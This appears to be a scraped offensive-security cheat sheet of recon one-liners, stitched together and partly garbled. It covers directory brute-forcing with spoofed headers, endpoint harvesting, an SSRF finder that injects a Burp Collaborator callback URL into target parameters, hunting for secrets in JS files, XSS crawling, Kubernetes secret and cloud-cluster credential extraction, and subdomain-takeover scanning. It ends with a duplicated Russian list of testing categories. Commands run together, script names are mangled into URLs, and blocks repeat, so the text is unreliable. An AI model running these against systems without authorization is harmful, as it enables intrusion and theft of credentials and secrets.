Dir Brute
assetfinder $target | sed 's#*.# #g' | httpx -silent -threads 10 | xargs -I@ sh -c 'gobuster dir -w /path/to/file -u @ -s 200 -t 150 -H "X-Forwarded-For:127.0.0.1"'cat hosts | xargs -I@ sh -c 'python3 http://dirsearch.py -r -b -w path -u @ -e php,html,json,aspx'/endpoints finder
echo "http://api.uber.com" | waybackurls | cut -d "/" -f 4,5 | sed 's/?.*//' | sort -uSSRF finder
assetfinder -t DOMAIN -q | httpx -silent -threads 1000 | gau | grep "=" | qsreplace http://YOUR.burpcollaborator.net
Sensetive in JS files
xargs -a urls.txt -I@ sh -c 'python3 http://SecretFinder.py -i @ -o cli -o '
xargs -a domains -I@ sh -c 'gau @ |grep -iE '\.js'|grep -ivE '\.json'|sort -u >> JS.txt' ; xargs -a JS.txt -n2 -I@ sh -c 'echo -e "\n[URL] @\n"; python3 linkfinder.py -i @ ' >> Url.txt
rush -i urls.txt 'python3 http://SecretFinder.py -i {} -o cli'XSS
cat subdomains.txt | waybackurls >> wayback.txt
cat subdomains.txt | hakrawler -depth 3 -plain >> spider.txt
cat spider.txt wayback.txt | kxss> kubectl get secrets
> kubectl get secret {mysecret} -o json | jq '.data'
{
"api-key": "c2VjcmV0LWFwaS1rZXk=",
"password": "c2VjcmV0LXBhc3N3b3Jk"
}
You need the the eks:DescribeCluster and eks:ListClusters AWS Identity and Access Management (IAM) policy, which allows you to list all of the Amazon EKS clusters in your AWS account.
AWS Policy example
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": [
"eks:DescribeCluster",
"eks:ListClusters"
],
"Resource": "*"
}
]
}
> aws eks list-clusters
> aws eks update-kubeconfig --name {name}
> gcloud container clusters list
> gcloud container clusters get-credentials <CLUSTER_NAME>
> az aks list
> az group list
> az aks get-credentials --name <CLUSTER_NAME> --resource-group <RESOURCE_GROUP_NAME>
#kubernetes
> kubectl get secret {mysecret} -o json | jq '.data'
{
"api-key": "c2VjcmV0LWFwaS1rZXk=",
"password": "c2VjcmV0LXBhc3N3b3Jk"
}
You need the the eks:DescribeCluster and eks:ListClusters AWS Identity and Access Management (IAM) policy, which allows you to list all of the Amazon EKS clusters in your AWS account.
AWS Policy example
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": [
"eks:DescribeCluster",
"eks:ListClusters"
],
"Resource": "*"
}
]
}
> aws eks list-clusters
> aws eks update-kubeconfig --name {name}
> gcloud container clusters list
> gcloud container clusters get-credentials <CLUSTER_NAME>
> az aks list
> az group list
> az aks get-credentials --name <CLUSTER_NAME> --resource-group <RESOURCE_GROUP_NAME>
#kubernetes
Find Subdomains TakeOver
#subdomains #subs #ato
#subdomains #subs #ato
subfinder -d {target} >> domains ; assetfinder -subs-only {target} >> domains ; amass enum -norecursive -noalts -d {target} >> domains ; subjack -w domains -t 100 -timeout 30 -ssl -c ~/go/src/github.com/haccer/subjack/fingerprints.json -v 3 >> takeover ;1. Информационная безопасность
2. Тестирование процесса безопасности
3. Тестирование технологии веб-безопасности
4. Тестирование безопасности каналов связи
5. Тестирование безопасности беспроводных технологий
6. Тестирование физической безопасности
2. Тестирование процесса безопасности
3. Тестирование технологии веб-безопасности
4. Тестирование безопасности каналов связи
5. Тестирование безопасности беспроводных технологий
6. Тестирование физической безопасности